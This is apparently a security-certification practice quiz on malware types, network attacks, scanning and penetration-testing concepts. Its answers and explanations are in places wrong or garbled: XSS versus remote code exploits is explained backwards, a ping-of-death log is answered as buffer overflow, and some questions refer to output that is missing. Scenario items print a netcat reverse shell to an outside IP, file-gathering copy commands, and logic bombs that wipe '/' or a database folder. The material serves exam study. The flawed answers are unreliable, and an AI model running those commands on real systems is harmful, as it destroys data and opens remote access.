Quiz A : Threats, Attacks, and Vulnerabilities

Which of the following is an example of resource exhaustion?

A. A penetration tester requests every available IP address from a DHCP server.

Which of the following differentiates a collision attack from a rainbow table attack?

A. A rainbow table attack performs a hash lookup. Explanation/Reference: A rainbow table is a precomputed table for reversing cryptographic hash functions, usually for cracking password hashes. A collision attack on a cryptographic hash tries to find two inputs producing the same hash value, i.e. a hash collision.

Which of the following enables sniffing attacks against a switched network?

A. ARP poisoning

Which of the following differentiates ARP poising from a MAC spoofing attack?

A. ARP poisoning uses unsolicited ARP replies. Explanation/Reference: The basic principle behind ARP spoofing is to exploit the lack of authentication in the ARP protocol by sending spoofed ARP messages onto the LAN. ARP spoofing attacks can be run from a compromised host on the LAN, or from an attacker's machine that is connected directly to the target LAN. Generally, the goal of the attack is to associate the attacker's host MAC address with the IP address of a target host, so that any traffic meant for the target host will be sent to the attacker's host. The attacker may choose to inspect the packets (spying), while forwarding the traffic to the actual default destination to avoid discovery, modify the data before forwarding it (man-in-the-middle attack), or launch a denial-of-service attack by causing some or all of the packets on the network to be dropped.

A remote intruder wants to take inventory of a network so exploits can be researched. The intruder is looking for information about software versions on the network. Which of the following techniques is the intruder using?

A. Banner grabbing Explanation/Reference: Banner grabbing is a technique used to gain information about a computer system on a network and the services running on its open ports. Administrators can use this to take inventory of the systems and services on their network. However, an intruder can use banner grabbing in order to find network hosts that are running versions of applications and operating systems with known exploits. Some examples of service ports used for banner grabbing are those used by Hyper Text Transfer Protocol (HTTP), File Transfer Protocol (FTP), and Simple Mail Transfer Protocol (SMTP); ports 80, 21, and 25 respectively. Tools commonly used to perform banner grabbing are Telnet, nmap, zmap and Netcat.

A security analyst is assigned to perform a penetration test for one of the company's clients. During the scope discussion, the analyst is notified that the client is not going to share any information related to the environment to be tested. Which of the following BEST identifies the type of penetration testing?

A. Black box

A senior incident response manager receives a call about some external IPs communicating with internal computers during off hours. Which of the following types of malware is MOST likely causing this issue?

A. Botnet Explanation/Reference: Botnets can be used to perform distributed denial-of-service attack (DDoS attack), steal data, send spam, and allows the attacker to access the device and its connection. The owner can control the botnet using command and control (C&C) software. The word "botnet" is a combination of the words "robot" and "network". The term is usually used with a negative or malicious connotation.

Which of the following threat actors is MOST likely to steal a company's proprietary information to gain a market edge and reduce time to market?

A. Competitor

A recent audit contained significant findings for several servers, including: In the future, which of the following capabilities would enable administrators to detect these issues proactively?

A. Credentialed vulnerability scan

A user is unable to open a file that has a grayed-out icon with a lock. The user receives a pop-up message indicating that payment must be sent in Bitcoin to unlock the file. Later in the day, other users in the organization lose the ability to open files on the server. Which of the following has MOST likely occurred? (Select Three)

A. Crypto-malware D. Virus E. Ransomware

During a penetration test, some servers in the network were found to be using Telnet as a remote connection protocol. Which of the following would mitigate the identified risk?

A. Disable Telnet and deploy SSH.

Which of the following components of printers and MFDs are MOST likely to be used as vectors of compromise if they are improperly configured?

A. Embedded web server

An information security specialist is reviewing the following output from a Linux server: user@server:~$ -l 5 * * * * /usr/local/bin.backup.sh user@server:~$ cat /usr/local/bin/backup.sh #!/bin/bash if ! grep --quiet joeuser /etc/passwd the rm -rf / fi Based on the above information, which of the following types of malware was installed on the server?

A. Logic bomb

A technician wants to perform network enumeration against a subnet in preparation for an upcoming assessment. During the first phase, the technician performs a ping sweep. Which of the following scan types did the technician use?

A. Non-intrusive

Which of the following should a security analyst perform FIRST to determine the vulnerabilities of a legacy system?

A. Passive scan Explanation/Reference: Legacy systems need caution when scanning for vulnerabilities. A vulnerability scan can cause system crashes in older systems.

Which of the following penetration testing concepts is an attacker MOST interested in when placing the path of a malicious file in the windows/Current Version.run registry key?

A. Persistence Explanation/Reference: The Current Version.run key will execute any file within the key, every time a user logs into the system. This means the attacker is establishing persistence.

A security auditor is performing a vulnerability scan to find out if mobile applications used in the organization are secure. The auditor finds out that one application has been accessed remotely with no legitimate account credentials. After investigating, it seems the application has allowed some user to bypass authentication of that application. Which of the following types of malware allows such a compromise to take place? (Select TWO).

A. RAT E. Backdoor Explanation/Reference: A Remote Access Trojan is a type of malware that controls a system through a remote network connection. While desktop sharing and remote administration have many legal uses, "RAT" connotes criminal or malicious activity. A RAT is typically installed without the victim's knowledge, often as payload of a Trojan horse, and will try to hide its operation from the victim and from security software and other anti-virus software.

A user downloads and installs an MP3 converter, and runs the application. Upon running the application, the antivirus detects a new port in a listening state. Which of the following has the user MOST likely executed?

A. RAT Explanation/Reference: A Remote Access Trojan is a type of malware that controls a system through a remote network connection. While desktop sharing and remote administration have many legal uses, "RAT" connotes criminal or malicious activity. A RAT is typically installed without the victim's knowledge, often as payload of a Trojan horse, and will try to hide its operation from the victim and from security software and other anti-virus software.

After a user reports slow computer performance, a systems administrator detects a suspicious file, which was installed as part of a freeware software package. The systems administrator reviews the output below: c:\Windows\system32>netstat -nab Active Connections Pronto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0 RpcSs [svchoat.exe] TCP 0.0.0.0:445 0.0.0.0 [svchost.exe] TCP 192.168.1.10:5000 10.37.213.20 winserver.exe UDP 192.168.1.10:1900 *.* SSDPSVR Based on the above information, which of the following types of malware was installed on the user's computer?

A. RAT Explanation/Reference: Port 5000 is a known backdoor setup threat.

Ann, a customer, is reporting that several important files are missing from her workstation. She recently received communication from an unknown party who is requesting funds to restore the files. Which of the following attacks has occurred?

A. Ransomware Explanation/Reference: Ransomware is a type of malicious software that threatens to publish the victim's data or perpetually block access to it unless a ransom is paid. While some simple ransomware may lock the system in a way which is not difficult for a knowledgeable person to reverse, more advanced malware uses a technique called cryptoviral extortion, in which it encrypts the victim's files, making them inaccessible, and demands a ransom payment to decrypt them. In a properly implemented cryptoviral extortion attack, recovering the files without the decryption key is an intractable problem - and difficult to trace digital currencies such as Ukash and cryptocurrency are used for the ransoms, making tracing and prosecuting the perpetrators difficult. Ransomware attacks are typically carried out using a Trojan that is disguised as a legitimate file that the user is tricked into downloading or opening when it arrives as an email attachment. However, one high-profile example, the "WannaCry worm", traveled automatically between computers without user interaction.

Which of the following BEST describes a network-based attack that can allow an attacker to take full control of a vulnerable host?

A. Remote exploit

A technician suspects that a system has been compromised. The technician reviews the following log entry: WARNING - hash mismatch: C:\Window\SysWOW64\user32.dll WARNING - hash mismatch: C:\Window\SysWOW64\kernel32.dll Based solely on the above information, which of the following types of malware is MOST likely installed on the system?

A. Rootkit

A security analyst is performing a pass the hash penetration testing. The security analyst has obtained the SAM, Security, and System hives from a compromised system and wants to view password hashes. Given this scenario, which of the following is the first step the security analyst should take?

A. Run a scan on the HKLM\SAM hive in the registry

An actor downloads and runs a program against a corporate login page. The program imports a list of usernames and passwords, looking for a successful attempt. Which of the following terms BEST describes the actor in this situation?

A. Script kiddie Explanation/Reference: a script kiddie, is an unskilled individual who uses scripts or programs developed by others to attack computer systems and networks and deface websites.

A user receives an email from ISP indicating malicious traffic coming from the user's home network is detected. The traffic appears to be Linux-based, and it is targeting a website that was recently featured on the news as being taken offline by an Internet attack. The only Linux device on the network is a home surveillance camera system. Which of the following BEST describes what is happening?

A. The camera system is infected with a bot.

An analyst is using a vulnerability scanner to look for common security misconfigurations on devices. Which of the following might be identified by the scanner? (Select TWO).

A. The firewall is disabled on workstations. D. Default administrator credentials exist on networking hardware.

A security analyst is attempting to break into a client's secure network. The analyst was not given prior information about the client, except for a block of public IP addresses that are currently in use. After network enumeration, the analyst's NEXT step is to perform:

A. a gray-box penetration test. Explanation/Reference: There are three testing types: Black box- Tester has no information of systems being tested Gray box- Tester has a limited amount of information of target, such as a block of IP addresses White box- Tester has full knowledge of systems.

A security administrator wants to implement a logon script that will prevent MITM attacks on the local LAN. Which of the following commands should the security administrator implement within the script to accomplish this task?

A. arp - s 192.168.1.1 00-3a-d1-fa-b1-06 Explanation/Reference: he Address Resolution Protocol (ARP) is a communication protocol used for discovering the link layer address, such as a MAC address, associated with a given internet layer address, typically an IPv4 address. arp uses broadcast arp messages to resolve IP addresses to their respective MAC addresses. An attacker can take advantage of this by broadcasting a spoofed entry to the network. arp -s creates a static entry into the arp cache, preventing arp poisoning

An analyst is reviewing a simple program for potential security vulnerabilities before being deployed to a Windows server. Given the following code: void foo (char *bar) { car random_user_input[12]; stropy (random_user_input, bar); } Which of the following vulnerabilities is present?

B. Buffer overflow Explanation/Reference: this example can be found on wikipedia at: https://en.wikipedia.org/wiki/Buffer_overflow

A security analyst monitors the syslog server and notices the following: pinging 10.25.27.31 with 65500 bytes of data Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128 Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128 Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128 Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128 Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128 Reply from 10.25.27.31 bytes=65500 times<1ms TTL=128 Which of the following attacks is occurring?

B. Buffer overflow Explanation/Reference: A ping of death is a type of attack on a computer system that involves sending a malformed or otherwise malicious ping to a computer. ... However, when the target computer reassembles the malformed packet, a buffer overflow can occur, causing a system crash and potentially allowing the injection of malicious code.

A penetration tester is assessing a large organization and obtains a valid set of basic user credentials from a compromised computer. Which of the following is the MOST likely to occur?

B. Credential harvesting

During a routine review of firewall log reports a security technician notices multiple successful logins for the admin user during unusual hours the technician contact the network administrator, who confirms the logins were not related to the administrator's activities. Which of the following is the most likely reason for these logins?

B. Default credentials were still in place. Explanation/Reference: A Default Credential vulnerability is a type of vulnerability that is most commonly found to affect the devices like modems, routers, digital cameras, and other devices having some pre-set (default) administrative credentials to access all configuration settings. The vendor or manufacturer of such devices uses a single predefined set of admin credentials to access the device configurations, and any potential hacker can misuse this fact to hack such devices, if those credentials are not changed by the consumers.

A security analyst is migrating a pass-the-hash vulnerability on a Windows infrastructure. Given the requirement, which of the following should the security analyst do to MINIMIZE the risk?

B. Disable NTLM Explanation/Reference: In cryptanalysis and computer security, pass the hash is a hacking technique that allows an attacker to authenticate to a remote server or service by using the underlying NTLM or LanMan hash of a user's password, instead of requiring the associated plaintext password as is normally the case. NTLM (NT LAN Manager) is Microsoft's old authentication protocol that was replaced with Kerberos starting Windows 2000. It was designed and implemented by Microsoft engineers for the purpose of authenticating accounts between Microsoft Windows machines and servers. The password hash is based on MD4, which is relatively weak. Second, even though the hash is salted before it is sent over the wire, it is saved unsalted in a machine's memory. But, the worst issue is that in order to authenticate to a machine, a user must respond to a challenge from the target, which exposes the password to offline cracking.

A security administrator is diagnosing a server where the CPU utilization is at 100% for 24 hours. The main culprit of CPU utilization is the antivirus program. Which of the following issue could occur if left unresolved? (Select TWO)

B. DoS attack E. Resource exhaustion

Which of the following types of penetration test will allow the tester to have access only to password hashes prior to the penetration test?

B. Gray box Explanation/Reference: There are three testing types: Black box- Tester has no information of systems being tested Gray box- Tester has a limited amount of information of target, such as a block of IP addresses White box- Tester has full knowledge of systems.

Which of the following threats has sufficient knowledge to cause the MOST danger to an organization?

B. Insiders Explanation/Reference: An insider threat is a malicious threat to an organization that comes from people within the organization, such as employees, former employees, contractors or business associates, who have inside information concerning the organization's security practices, data and computer systems. The threat may involve fraud, the theft of confidential or commercially valuable information, the theft of intellectual property, or the sabotage of computer systems. The insider threat comes in three categories: 1) malicious insiders, which are people who take advantage of their access to inflict harm on an organization; 2) negligent insiders, which are people who make errors and disregard policies, which place their organizations at risk; and 3) infiltrators, who are external actors that obtain legitimate access credentials without authorization.

An organization's IT department announced plans to update workstation operating systems to the latest version after electing to skip the prior two versions. Which of the following vulnerabilities is the organization seeking to mitigate?

B. Lack of vendor support on the version currently in use

A security analyst conducts a manual scan on a known hardened host that identifies many non-compliant items. Which of the following BEST describe why this has occurred? (Select TWO)

B. Non-applicable plug ins were selected in the scan policy D. The output of the report contains false positives

Compared to a non-credentialed scan, which of the following is a unique result of a credentialed scan?

B. Outdated software versions on the host Explanation/Reference: Credentialed scan: A credentialed scan is a much safer version of the vulnerability scanner. It provides more detailed information than a non-credentialed scan. You can also set up the auditing of files and user permissions.

A security analyst is attempting to identify vulnerabilities in a customer's web application without impacting the system or its data. Which of the following BEST describes the vulnerability scanning concept performed?

B. Passive scan Explanation/Reference: Passive scanning is a method of vulnerability detection that relies on information gleaned from network data that is captured from a target computer without direct interaction. Packet sniffing applications can be used for passive scanning to reveal information such as operating system, known protocols running on non-standard ports and active network applications with known bugs. Passive scanning may be conducted by a network administrator scanning for security vulnerabilities or by an intruder as a preliminary to an active attack. For an intruder, passive scanning's main advantage is that it does not leave a trail that could alert users or administrators to their activities. For an administrator, the main advantage is that it doesn't risk causing undesired behavior on the target computer, such as freezes. Because of these advantages, passive scanning need not be limited to a narrow time frame to minimize risk or disruption, which means that it is likely to return more information. Passive scanning does have limitations. It is not as complete in detail as active vulnerability scanning and cannot detect any applications that are not currently sending out traffic; nor can it distinguish false information put out for obfuscation.

A third-party penetration testing company was able to successfully use an ARP cache poison technique to gain root access on a server. The tester successfully moved to another server that was not in the original network. Which of the following is the MOST likely method used to gain access to the other host?

B. Pivoting Explanation/Reference: Pivoting refers to a method used by penetration testers that uses the compromised system to attack other systems on the same network to avoid restrictions such as firewall configurations, which may prohibit direct access to all machines. For example, if an attacker compromises a web server on a corporate network, the attacker can then use the compromised web server to attack other systems on the network.

A technician is evaluating malware that was found on the enterprise network. After reviewing samples of the malware's binaries, the technician finds each has a different hash associated with it. Which of the following types of malware is MOST likely present in the environment?

B. Polymorphic worm

A systems administrator found a suspicious file in the root of the file system. The file contains URLs, usernames, passwords, and text from other documents being edited on the system. Which of the following types of malware would generate such a file?

B. Rootkit Explanation/Reference: Modern rootkits do not elevate access,[3] but rather are used to make another software payload undetectable by adding stealth capabilities.[8] Most rootkits are classified as malware, because the payloads they are bundled with are malicious. For example, a payload might covertly steal user passwords, credit card information, computing resources, or conduct other unauthorized activities. A small number of rootkits may be considered utility applications by their users: for example, a rootkit might cloak a CD-ROM-emulation driver, allowing video game users to defeat anti-piracy measures that require insertion of the original installation media into a physical optical drive to verify that the software was legitimately purchased. Rootkits and their payloads have many uses: Provide an attacker with full access via a backdoor, permitting unauthorized access to, for example, steal or falsify documents. One of the ways to carry this out is to subvert the login mechanism, such as the /bin/login program on Unix-like systems or GINA on Windows. The replacement appears to function normally, but also accepts a secret login combination that allows an attacker direct access to the system with administrative privileges, bypassing standard authentication and authorization mechanisms. Conceal other malware, notably password-stealing key loggers and computer viruses.[18] Appropriate the compromised machine as a zombie computer for attacks on other computers. (The attack originates from the compromised system or network, instead of the attacker's system.) "Zombie" computers are typically members of large botnets that can launch denial-of-service attacks, distribute e-mail spam, conduct click fraud, etc. Enforcement of digital rights management (DRM).

An external attacker can modify the ARP cache of an internal computer. Which of the following types of attacks is described?

B. Spoofing Explanation/Reference: Many of the protocols in the TCP/IP suite do not provide mechanisms for authenticating the source or destination of a message, and are thus vulnerable to spoofing attacks when extra precautions are not taken by applications to verify the identity of the sending or receiving host. IP spoofing and ARP spoofing in particular may be used to leverage man-in-the-middle attacks against hosts on a computer network. Spoofing attacks which take advantage of TCP/IP suite protocols may be mitigated with the use of firewalls capable of deep packet inspection or by taking measures to verify the identity of the sender or recipient of a message.

Emails containing the URL of a popular technology forum were sent from an external source to a research and development company. When users at the company load the page, malware infects their system. Which of the following BEST describes this scenario?

B. The email is intended to bait users into accessing a watering hole.

Which of the following are considered among the BEST indicators that a received message is a hoax? (SELECT 2)

B. Warnings of monetary loss to the receiver D. Claims of possible damage to computer hardware

A public announcement is made about a newly discovered, rapidly spreading virus. The security team immediately updates and applies all its antivirus signatures. The security manager contacts the antivirus vendor support team to ask why one of the systems was infected. The vendor support team explains that the signature update is not available for this virus yet. Which of the following BEST describes this situation?

B. Zero day Explanation/Reference: Zero day means the malware is using a software vulnerability for which there is currently no available defense or fix

A penetration testing team deploys a specifically crafted payload to a web server, which results in opening a new session as the web server daemon. This session has full read/write access to the file system and the admin console. Which of the following BEST describes the attack?

B. injection

A penetration tester harvests potential usernames from a social networking site. The penetration tester then uses social engineering to attempt to obtain associated passwords to gain unauthorized access to shares on a network server. Which of the following methods is the penetration tester MOST likely using?

C. Active reconnaissance

While browsing an external website, a human resources manager opens several links in new browser tabs to review later. After browsing 20 minutes, a full screen message appears in a completely new browser window with a critical error code and a help desk number to call. At the same time, an audio message plays over the laptop speaker, describing a critical error and warning that the IP address of the laptop will be blocked until the critical issue is resolved. The human resources manager is unable to escape out of the error message, and the keyboard is not responsive. After alerting the security team, the human resources manager holds down the power button to turn off the laptop and then powers it back on, which rectifies the issue. Which of the following BEST describes the type of attack the human resources manager is experiencing?

C. Adware

A company has noticed multiple instances of proprietary information on public websites. It has also observed an increase in the number of email messages sent to random employees containing malicious links and PDFs. Which of the following changes should the company make to reduce the risks associated with phishing attacks? (Select TWO)

C. Block access to personal email on corporate systems E. Update corporate policy to prohibit access to social media websites

Which of the following specifically describes the exploitation of an interactive process to access otherwise restricted areas of the OS?

C. Buffer overflow Explanation/Reference: A buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory locations. Buffers are areas of memory set aside to hold data, often while moving it from one section of a program to another, or between programs. Buffer overflows can often be triggered by malformed inputs; if one assumes all inputs will be smaller than a certain size and the buffer is created to be that size, then an anomalous transaction that produces more data could cause it to write past the end of the buffer. If this overwrites adjacent data or executable code, this may result in erratic program behavior, including memory access errors, incorrect results, and crashes.

A vulnerability scan is being conducted against a desktop system. The scan is looking for files, versions, and registry values known to be associated with system vulnerabilities. Which of the following BEST describes the type of scan being performed?

C. Credentialed Explanation/Reference: With vulnerability scan, you can perform a credentialed or non-credentialed vulnerability scan. A non-credentialed scan is the easiest and quickest; it reports back only the open services on the network. A credentialed scan goes further by attempting to connect to a resource with a set or list of credentials supplied before the scan. This scan requires getting an accurate list of credentials but provides better insight into insider attacks.

An employee is having issues when attempting to access files on a laptop. The machine was previously running slow, and many files were not accessible. The employee is not able to access the hard drive the next day, and all the file names were changed to some random names. Which of the following BEST represents what compromised the machine?

C. Crypto-malware

An auditor confirms the risk associated with a Windows specific vulnerability, which was discovered by the company's security tool, does not apply due to the server running a LinuxOS. Which of the following does this BEST describe?

C. False positive

A help desk technician receives a phone call from an individual claiming to be an employee of the organization and requesting assistance to access a locked account. The help desk technician asks the individual to provide proof of identity before access can be granted. Which of the following types of attack is the caller performing?

C. Impersonation

A security manager discovers the most recent vulnerability scan report illustrates low-level non-critical findings. Which of the following scanning concepts would BEST report critical threats?

C. Intrusive scan

A security administrator is reviewing the following PowerShell script referenced in the Task Scheduler on a database server: $members = GetADGroupMemeber -Identity "Domain Admins" -Recursive | Select ExpandProperty name if ($members -notcontains "JohnDoe"){ Remove-Item -path C:\Database -recurse -force } Which of the following did the security administrator discover?

C. Logic bomb

Which of the following uses precomputed hashes to guess passwords?

C. Rainbow tables Explanation/Reference: A rainbow table is a precomputed table for reversing cryptographic hash functions, usually for cracking password hashes.

The POODLE attack is an MITM exploit that affects:

C. SSLv3.0 with CBC mode cipher Explanation/Reference: A flaw was found in the way SSL 3.0 handled padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. How To Protect your Server Against the POODLE SSLv3 Vulnerability On October 14th, 2014, a vulnerability in version 3 of the SSL encryption protocol was disclosed. This vulnerability, dubbed POODLE (Padding Oracle On Downgraded Legacy Encryption), allows an attacker to read information encrypted with this version of the protocol in plain text using a man-in-the-middle attack. Although SSLv3 is an older version of the protocol which is mainly obsolete, many pieces of software still fall back on SSLv3 if better encryption options are not available. More importantly, it is possible for an attacker to force SSLv3 connections if it is an available alternative for both participants attempting a connection. The POODLE vulnerability affects any services or clients that make it possible to communicate using SSLv3. Because this is a flaw with the protocol design, and not an implementation issue, every piece of software that uses SSLv3 is vulnerable. To find out more information about the vulnerability, consult the CVE information found at CVE-2014-3566. What is the POODLE Vulnerability? The POODLE vulnerability is a weakness in version 3 of the SSL protocol that allows an attacker in a man-inthe-middle context to decipher the plain text content of an SSLv3 encrypted message. Who is Affected by this Vulnerability? This vulnerability affects every piece of software that can be coerced into communicating with SSLv3. This means that any software that implements a fallback mechanism that includes SSLv3 support is vulnerable and can be exploited. Some common pieces of software that may be affected are web browsers, web servers, VPN servers, mail servers, etc. How Does It Work? In short, the POODLE vulnerability exists because the SSLv3 protocol does not adequately check the padding bytes that are sent with encrypted messages. Since these cannot be verified by the receiving party, an attacker can replace these and pass them on to the intended destination. When done in a specific way, the modified payload will potentially be accepted by the recipient without complaint. An average of once out of every 256 requests will accepted at the destination, allowing the attacker to decrypt a single byte. This can be repeated easily in order to progressively decrypt additional bytes. Any attacker able to repeatedly force a participant to resend data using this protocol can break the encryption in a very short amount of time. How Can I Protect Myself? Actions should be taken to ensure that you are not vulnerable in your roles as both a client and a server. Since encryption is usually negotiated between clients and servers, it is an issue that involves both parties. Servers and clients should should take steps to disable SSLv3 support completely. Many applications use better encryption by default, but implement SSLv3 support as a fallback option. This should be disabled, as a malicious user can force SSLv3 communication if both participants allow it as an acceptable method.

A recent internal audit is forcing a company to review each internal business unit's VMs because the cluster they are installed on is in danger of running out of computer resources. Which of the following vulnerabilities exist?

C. System sprawl

A security auditor is testing perimeter security in a building that is protected by badge readers. Which of the following types of attacks would MOST likely gain access?

C. Tailgating

An employee in the finance department receives an email, which appears to come from the Chief Financial Officer (CFO), instructing the employee to immediately wire a large sum of money to a vendor. Which of the following BEST describes the principles of social engineering used? (Select TWO)

C. Urgency F. Authority

Which of the following describes the key difference between vishing and phishing attacks?

C. Vishing attacks are accomplished using telephony services.

The network team has detected a large amount of traffic between workstations on the network. The traffic as initially very light, but it is increasing exponentially as the day progresses. Which of the following types of malware might be suspected?

C. Worm Explanation/Reference: As a worm propagates throughout a network, the increased traffic from infected host to new targets will increase bandwidth usage.

Which of the following attack types BEST describes a client-side attack that is used to manipulate an HTML iframe with JavaScript code via a web browser?

C. XSS Explanation/Reference: Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.

A security analyst is monitoring the network and observes unusual traffic coming from a host on the LAN. Using a network monitoring tool, the analyst observes the following information: After ten seconds, some computers shown in the IP Dst field start to exhibit the same behavior and immediately make multiple outbound connection attempts. Based on this observed behavior, which of the following is the MOST likely cause?

D. A worm is attacking the network. Explanation/Reference: The indicator that this is a worm is the source and destination IP addresses. The source IPis one system, and it is trying to establish connections with multiple IPs.

A technician is investigating a potentially compromised device with the following symptoms: ~Browser slowness ~Frequent browser crashes ~Hourglass stuck ~New search toolbar ~Increased memory consumption Which of the following types of malware has infected the system?

D. Adware Explanation/Reference: The term adware is frequently used to describe a form of malware (malicious software) which presents unwanted advertisements to the user of a computer. The advertisements produced by adware are sometimes in the form of a pop-up or sometimes in an "unclosable window". When the term is used in this way, the severity of its implication varies. While some sources rate adware only as an "irritant", others classify it as an "online threat" or even rate it as seriously as computer viruses and trojans. The precise definition of the term in this context also varies. Adware that observes the computer user's activities without their consent and reports it to the software's author is called spyware.

Which of the following BEST describes the impact of an unremediated session timeout vulnerability?

D. An attacker could use an existing session that has been initiated by a legitimate user

A security analyst believes an employee's workstation has been compromised. The analyst reviews the system logs, but does not find any attempted logins. The analyst then runs the cliff command, comparing the CAWindows\System32 directory and the installed cache directory. The analyst finds a series of files that look suspicious. One of the files contains the following commands: cmd /C %TEMP\nc -c cmd.exe 34.100.43.230 copy *.doc > %TEMP%\docfiles.zip copy *.xls > %TEMP%\xlsfiles.zip copy *.pdf > %TEMP%\pdffiles.zip Which of the following types of malware was used?

D. Backdoor

An analyst is part of a team that is investigating a potential breach of sensitive data at a large organization, which serves the financial sector. The organization suspects a breach occurred when proprietary data was disclosed to the public. the team finds servers were accessed using shared credentials that have been in place for some time. In addition, the team discovers undocumented firewall rules, which provided unauthorized external access to a server. Suspecting the activities of a malicious insider threat, which of the following was the MOST likely to have been utilized to exfiltrate the proprietary data?

D. Backdoor Explanation/Reference: A backdoor is a malware type that negates normal authentication procedures to access a system. As a result, remote access is granted to resources within an application, such as databases and file servers, giving perpetrators the ability to remotely issue system commands and update malware.

A security analyst is conducting a web application vulnerability scan against the company website. Which of the following is considered an intrusive scan?

D. Cipher suite order

A systems administrator is deploying a new mission essential server into a virtual environment. Which of the following is BEST mitigated by the environment's rapid elasticity characteristic?

D. Denial of service Explanation/Reference: Virtual environments can help mitigate Denial of Service attacks by quickly allocating more resources from the host machine to handle the flood of traffic that a Denial of Service attack generates.

Which of the following is commonly done as part of a vulnerability scan?

D. Identifying unpatched workstations

A new security administrator ran a vulnerability scanner for the first time and caused a system outage. Which of the following types of scans MOST likely caused the outage?

D. Intrusive non-credentialed scan Explanation/Reference: Vulnerability scanners generally take one of two approaches to discovering security holes: nonintrusive or intrusive scanning. Nonintrusive methods generally include a simple scan of the target system's attributes (e.g., inspecting the file system for specific files or file versions, checking the registry for specific values, scanning for missing security updates, port scanning to discover which services are listening). Intrusive scanning actually tries to exploit the vulnerabilities the scanner is looking for. Several products use varying levels of intrusive scanning and let you pick an increasing or decreasing level of intrusiveness. Always be wary when scanning production computers, lest a scan's successful exploit accidentally takes down the target system.

Ann, a user, states that her machine has been behaving erratically over the past week. She has experienced slowness and input lag and found text files that appear to contain pieces of her emails or online conversations with coworkers. The technician runs a standard virus scan but detects nothing. Which of the following types of malware has infected the machine?

D. Keylogger Explanation/Reference: Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording (logging) the keys struck on a keyboard, typically covertly, so that person using the keyboard is unaware that their actions are being monitored. Data can then be retrieved by the person operating the logging program. A keylogger can be either software or hardware.

Hacktivists are commonly motivated by?

D. Political Cause

Which of the following is a major difference between XSS attacks and remote code exploits?

D. Remote code exploits allow writing code at the client side and executing it, while XSS attacks require no code to work.

A website form is used to register new students at a university. The form passes the unsanitized values entered by the user and uses them to directly add the student's information to several core systems. Which of the following attacks can be used to gain further access due to this practice?

D. SQL Injection Explanation/Reference: SQL injection is a code injection technique, used to attack data-driven applications, in which diabolical SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

In determining when it may be necessary to perform a credentialed scan against a system instead of a noncredentialed scan, which of the following requirements is MOST likely to influence its decisions?

D. The scanner must be able to audit file system permissions Explanation/Reference: Non-credentialed: A non-credentialed scan will monitor the network and see any vulnerabilities that an attacker would easily find; we should fix the vulnerabilities found with a non-credentialed scan first, as this is what the hacker will see when they enter your network. For example, an administrator runs a non-credentialed scan on the network and finds that there are three missing patches. The scan does not provide many details on these missing patches. The administrator installs the missing patches to keep the systems up to date as they can only operate on the information produced for them. Credentialed scan: A credentialed scan is a much safer version of the vulnerability scanner. It provides more detailed information than a non-credentialed scan. You can also set up the auditing of files and user permissions.

A malicious system continuously sends an extremely large number of SYN packets to a server. Which of the following BEST describes the resulting effect?

D. The server will exhaust its memory maintaining half-open connections Explanation/Reference: When a system tries to establish a connection with a server, it will send a SYN packet to the server, initiating a three-way handshake. The server will then reply with a SYN/ACK response, and wait for the final ACK response from the originating system. When there is no response, the server maintains the half-open connections, resulting in possible resource exhaustion.

A network administrator is reviewing the following IDS logs: Based on the above information, which of the following types of malware is triggering the IDS?

D. Worm Explanation/Reference: A computer worm is a standalone malware computer program that replicates itself in order to spread to other computers. Often, it uses a computer network to spread itself, relying on security failures on the target computer to access it. Worms almost always cause at least some harm to the network, even if only by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer.

When attackers use a compromised host as a platform for launching attacks deeper into a company's network, it is said that they are:

D. pivoting

Pivoting

Pivoting refers to a method used by penetration testers that uses the compromised system to attack other systems on the same network to avoid restrictions such as firewall configurations, which may prohibit direct access to all machines. For example, if an attacker compromises a web server on a corporate network, the attacker can then use the compromised web server to attack other systems on the network.